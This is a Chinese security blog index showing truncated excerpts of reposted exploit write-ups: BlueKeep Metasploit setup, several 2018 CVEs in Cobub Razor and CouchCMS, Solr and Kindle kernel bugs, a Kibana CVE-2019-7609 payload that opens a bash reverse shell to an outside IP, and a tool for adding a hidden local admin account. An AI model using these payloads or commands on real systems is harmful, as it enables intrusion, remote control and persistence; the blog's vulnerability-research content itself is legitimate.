JoCat's blog

声明该文章为转载总结文章，如有侵权，请联系JoCatWFY@163.com sudo apt-get install libsqlite3-dev libpq-dev libpcap-dev -ygit clone https://github.com/rapid7/metasploit-framework.gitcd metasploit-frameworkgit fetch origin pull/12283/head:bluekeepgit checkout bluekeepgem install bundler && bundle./msfconsolemsf5 > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce 如果出现如下错误: /usr/local/bundle/bin/bundle:104:in `load': cannot load ...

声明该文章为转载总结文章，如有侵权，请联系JoCatWFY@163.com 漏洞简介 漏洞名称 上报日期 漏洞发现者 产品首页 软件链接 版本 CVE编号 Couch through 2.0存在路径泄露漏洞 2018-03-04 zzw (zzw@5ecurity.cn) https://github.com/CouchCMS/CouchCMS/ https://github.com/CouchCMS/CouchCMS/ 2.0 CVE-2018-7662 漏洞概述 Couch through 2.0存在路径泄露漏洞，当访问特定url时系统返回的报错信息中暴露物理路径信息。Couch through是一个在github上开源的系统，漏洞发现者已经将漏洞信息通过issues告知作者。 P ...

声明该文章为转载总结文章，如有侵权，请联系JoCatWFY@163.com 漏洞简介 漏洞名称 上报日期 漏洞发现者 产品首页 软件链接 版本 CVE编号 Cobub Razor 0.8.0存在物理路径泄露漏洞 2018-04-20 Kyhvedn（yinfengwuyueyi@163.com、kyhvedn@5ecurity.cn） http://www.cobub.com/ https://github.com/cobub/razor/ 0.8.0 CVE-2018-8056/CVE-2018-8770 漏洞概述 Cobub Razor 0.8.0存在物理路径泄露漏洞，当访问特定url时，系统会显示物理路径信息 ...

声明该文章为转载总结文章，如有侵权，请联系JoCatWFY@163.com 漏洞简介 漏洞名称 上报日期 漏洞发现者 产品首页 软件链接 版本 CVE编号 Cobub Razor 0.8.0存在SQL注入漏洞 2018-04-16 Kyhvedn（yinfengwuyueyi@163.com、kyhvedn@5ecurity.cn） http://www.cobub.com/ https://github.com/cobub/razor/ 0.8.0 CVE-2018-8057 漏洞概述 Cobub Razor 0.8.0存在SQL注入漏洞，“/application/controllers/manage/chann ...

声明该文章为转载总结文章，如有侵权，请联系JoCatWFY@163.com 漏洞简介 漏洞名称 上报日期 漏洞发现者 产品首页 软件链接 版本 CVE编号 Cobub Razor 0.7.2越权增加管理员账户 2018-04-09 ppb（ppb@5ecurity.cn） https://github.com/cobub/razor/ https://github.com/cobub/razor/ 0.72 CVE-2018-7745 漏洞概述 Cobub Razor 0.7.2越权增加管理员账户漏洞，在不登录的情况下发送特定数据包，可新增管理员账号。保存如下利用代码为html页面，打开页面将增加test/test123的管理员账号，漏洞发现者已经将漏洞信息通过issues告知作 ...

声明该文章为转载总结文章，如有侵权，请联系JoCatWFY@163.com 漏洞简介 漏洞名称 上报日期 漏洞发现者 产品首页 软件链接 版本 CVE编号 Cobub Razor 0.7.2存在跨站请求伪造漏洞 2018-03-06 Kyhvedn（yinfengwuyueyi@163.com、kyhvedn@5ecurity.cn） http://www.cobub.com/ https://github.com/cobub/razor/ 0.7.2 CVE-2018-7720 漏洞概述 Cobub Razor 0.7.2存在跨站请求伪造漏洞，管理员登陆后访问特定页面可增加管理员账号。保存如下利用代码为ht ...

声明该文章为转载总结文章，如有侵权，请联系JoCatWFY@163.com Apache Solr RCE via Velocity templateSet "params.resource.loader.enabled" as true.Request:================================================& ...

声明该文章为转载总结文章，如有侵权，请联系JoCatWFY@163.com 漏洞简介 漏洞名称 上报日期 漏洞发现者 产品首页 软件链接 版本 CVE编号 Amazon Kindle Fire HD (3rd Generation)内核驱动拒绝服务漏洞 2018-10-10 大兵 http://www.amazon.com/ 下载连接 Fire OS 4.5.5.3 CVE-2018-11021 漏洞概述 Amazon Kindle Fire HD(3rd) Fire OS 4.5.5.3的内核模块/omap/drivers/video/omap2/dsscomp/device.c代码中存在漏洞，允许攻击者通过ioctl向驱动模块/dev/dsscomp发生命令为1118064517且精心构造的payload参数，导致内核崩溃。 POC实现代码如下： exp代码如下： /* * This is poc of Ki ...

声明该文章为转载总结文章，如有侵权，请联系JoCatWFY@163.com CVE-2019-7609-kibana<6.6.0未授权远程代码命令执行POC将POC里的反链IP地址换成自己的，然后在目标机器上的 Timelion 选项下将以下 POC 粘贴进去，然后点击 Run 运行： .es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/10.10.20.166/8989 0>&1");process.exit()//').props(label.__proto__.env.NODE_OPTIONS='--require  ...

声明该文章为转载总结文章，如有侵权，请联系JoCatWFY@163.com adduser 单文件添加用户 【内网渗透-创建Windows用户】 Ps: net net1 等常见命令被过滤 简介：adduser项目以编程方式创建“本地管理员” Windows用户。需要管理员权限。创建的用户被硬编码为以下内容： 默认登录名：audit 密码：（Test123456789! ） 你可以在源码中自定义修改账号密码 内容来自 https://twitter.com/jas502n/status/1214413798330601472 此处仅作学习保留